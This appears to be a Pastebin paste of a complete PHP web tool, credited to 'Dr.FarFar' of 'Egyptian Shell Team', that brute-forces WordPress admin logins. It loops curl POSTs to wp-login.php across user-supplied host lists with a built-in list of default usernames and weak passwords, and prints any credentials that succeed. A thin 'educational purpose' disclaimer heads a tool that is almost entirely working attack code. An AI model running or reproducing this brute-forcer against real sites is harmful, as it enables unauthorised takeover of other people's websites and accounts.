Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- echo "
- <!--
- WordPress Admin Panel Brute Force Attacks | Egyptian Shell Team Penetration Testing
- Powered By Dr.FarFar
- PS: This Tool is For Penetration Testing And Educational Purpose, Dr.FarFar Is Not Responsible At Any Bad Using For This Tool.
- This program is free software: you can redistribute it and/or modify
- it under the terms of the GNU General Public License as published by
- the Free Software Foundation, either version 3 of the License, or
- (at your option) any later version.
- -->
- ";
- error_reporting(0);
- set_time_limit(0);
- ignore_user_abort(true);
- ?>
- <html>
- <head>
- <title> | </title>
- <HEAD>
- <SCRIPT LANGUAGE="JavaScript">
- <!-- Begin
- var message = new Array();
- // Set your messages below -- follow the pattern.
- // To add more messages, just add more elements to the array.
- message[0] = "WordPress Admin Panel Brute Force Attacks";
- message[1] = "Powered By Dr.FarFar";
- message[2] = "Egyptian Shell Team Penetration Testing";
- message[3] = "Egyptian Shell Team";
- message[4] = "Powered By Dr.FarFar";
- message[5] = "Egyptian Shell Team Penetration Testing";
- message[6] = "Powered By Dr.FarFar";
- // Set the number of repetitions (how many times the arrow
- // cycle repeats with each message).
- var reps = 2;
- var speed = 200; // Set the overall speed (larger number = slower action).
- // DO NOT EDIT BELOW THIS LINE.
- var p = message.length;
- var T = "";
- var C = 0;
- var mC = 0;
- var s = 0;
- var sT = null;
- if (reps < 1) reps = 1;
- function doTheThing() {
- T = message[mC];
- A();
- }
- function A() {
- s++;
- if (s > 8) { s = 1;}
- // you can fiddle with the patterns here...
- if (s == 1) { document.title = '||||||====||[ '+T+' ]||====||||||'; }
- if (s == 2) { document.title = '|||=|||===||[ '+T+' ]||===|||=|||'; }
- if (s == 3) { document.title = '|||==|||==||[ '+T+' ]||==|||==|||'; }
- if (s == 4) { document.title = '|||===|||=||[ '+T+' ]||=|||===|||'; }
- if (s == 5) { document.title = '|||====|||||[ '+T+' ]|||||====|||'; }
- if (s == 6) { document.title = '|||===|||=||[ '+T+' ]||=|||===|||'; }
- if (s == 7) { document.title = '|||==|||==||[ '+T+' ]||==|||==|||'; }
- if (s == 8) { document.title = '|||=|||===||[ '+T+' ]||===|||=|||'; }
- if (C < (8 * reps)) {
- sT = setTimeout("A()", speed);
- C++;
- }
- else {
- C = 0;
- s = 0;
- mC++;
- if(mC > p - 1) mC = 0;
- sT = null;
- doTheThing();
- }
- }
- doTheThing();
- // End -->
- </script>
- <meta http-equiv=Content-Type content=text/html; charset=utf-8 charset=UTF-8>
- <style type="text/css">
- body {
- color: white;
- background-image: url(http://i283.photobucket.com/albums/kk281/fjachel/Black-background.gif);
- }
- textarea {
- border-radius: 8px;
- color: white;
- background-color:black;
- }
- input[type=submit] , .submit{
- background-color:black;
- color:white;
- border-radius:8px;
- }
- p {
- font-size: 10px;
- text-align: center;
- }
- a:link,a:hover,a:visited {
- color:pink;
- }
- </style>
- </head>
- <!-- Dr.FarFar | WordPress Admin Panel Brute Force Attacks | Egyptian Shell Team Penetration Testing -->
- <center>
- <p><a href="http://9eg.blogspot.com" target="_blank"><img
- src="http://im37.gulfup.com/VLNdW.png"
- border="0"/></a></p>
- <form enctype="multipart/form-data" method="POST">
- <table width='624' border='0' id='Box'>
- <tr>
- <td width='4%'> </td>
- <p><span style="color:#FFFF00;"><span style="font-size:28px;"><strong>WordPress Admin Panel</strong> <strong style="margin: 0px; padding: 0px; border: 0px; font-style: inherit; line-height: inherit; font-family: inherit;">Brute Force Attacks</strong></span></span></p>
- <tr>
- <td > </td>
- <td ><b><p>Hosts:</p></b></td>
- <td ><b><p> Users:</p></b></td>
- <td ><b><p>Passwords:</p></b></td>
- </tr>
- <tr>
- <td> </td>
- <td ><textarea name="hosts" cols="30" rows="10" ><?php if($_POST){echo $_POST['hosts'];} ?></textarea></td>
- <td ><textarea name="usernames" cols="30" rows="10" ><?php if($_POST){echo $_POST['usernames'];}else {echo
- "admin\nadministrator";} ?></textarea></td>
- <td ><textarea name="passwords" cols="30" rows="10" ><?php if($_POST){echo $_POST['passwords'];}else {echo "admin\nadministrator\n123123\n123321\n123456\n1234567\n12345678\n123456789\n123456123456\nadmin2010\nadmin2011\npassword\nP@ssW0rd\n!@#$%^\n!@#$%^&*(\n(*&^%$#@!\n111111\n222222\n333333\n444444\n555555\n666666\n777777\n888888\n999999";} ?></textarea></td>
- </tr>
- <tr><td colspan="4"><input type="submit" name="submit" value="[ Attack Now ]" />
- <?php
- if($_POST)
- {
- $hosts = trim(filter($_POST['hosts']));
- $passwords = trim(filter($_POST['passwords']));
- $usernames = trim(filter($_POST['usernames']));
- if($passwords && $usernames && $hosts)
- {
- $hosts_explode = explode("\n", $hosts);
- $usernames_explode = explode("\n", $usernames);
- $passwords_explode = explode("\n", $passwords);
- foreach($hosts_explode as $host)
- {
- $host = RemoveLastSlash($host);
- $hacked = 0;
- $host = str_replace(array("http://","https://","www."),"",trim($host));
- $host = "http://".$host;
- $wpAdmin = $host.'/wp-admin/';
- if(!url_exists($host."/wp-login.php"))
- {echo "<p>".$host." => <font color='red'>Error In Login Page !</font></p>";ob_flush();flush
- ();continue;}
- foreach($usernames_explode as $username)
- {
- foreach($passwords_explode as $password)
- {
- $ch = curl_init();
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch,CURLOPT_URL,$host.'/wp-login.php');
- curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
- curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
- curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($ch,CURLOPT_POST,TRUE);
- curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".
- $password."&wp-submit=Giri?"."&redirect_to=".$wpAdmin."&testcookie=1");
- $login = curl_exec($ch);
- if(eregi ("profile.php",$login) )
- {
- $hacked = 1;
- echo "<p>".$host." => UserName : [<font color='green'>".
- $username."</font>] : Password : [<font color='green'>".$password."</font>]</p>";
- ob_flush();flush();break;
- }
- }
- if($hacked == 1){break;}
- }
- if($hacked == 0)
- {echo "<p>".$host." => <font color='red'>Failed !</font></p>";ob_flush();flush();}
- }
- }
- else {echo "<p><b><font color='red'>All fields are Required ! </font></b></p>";}
- }
- ?>
- </td></tr>
- </table></form>
- <!-- Dr.FarFar | WordPress Admin Panel Brute Force Attacks | Egyptian Shell Team Penetration Testing -->
- <p><strong>Powered By <a href="http://9eg.blogspot.com">Dr.FarFar</a></strong></p>
- </center>
- <p>
- <?php
- function url_exists($strURL)
- {
- $resURL = curl_init();
- curl_setopt($resURL, CURLOPT_URL, $strURL);
- curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);
- curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback');
- curl_setopt($resURL, CURLOPT_FAILONERROR, 1);
- curl_exec ($resURL);
- $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE);
- curl_close ($resURL);
- if ($intReturnCode != 200){return false;}
- else{return true ;}
- }
- function filter($string)
- {
- if(get_magic_quotes_gpc() != 0){return stripslashes($string); }
- else{return $string; }
- }
- function RemoveLastSlash($host)
- {
- if(strrpos($host, '/', -1) == strlen($host)-1)
- {return substr($host,0,strrpos($host, '/', -1));}
- else{return $host;}
- }
- ?>
- <?php echo "</p>"; ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement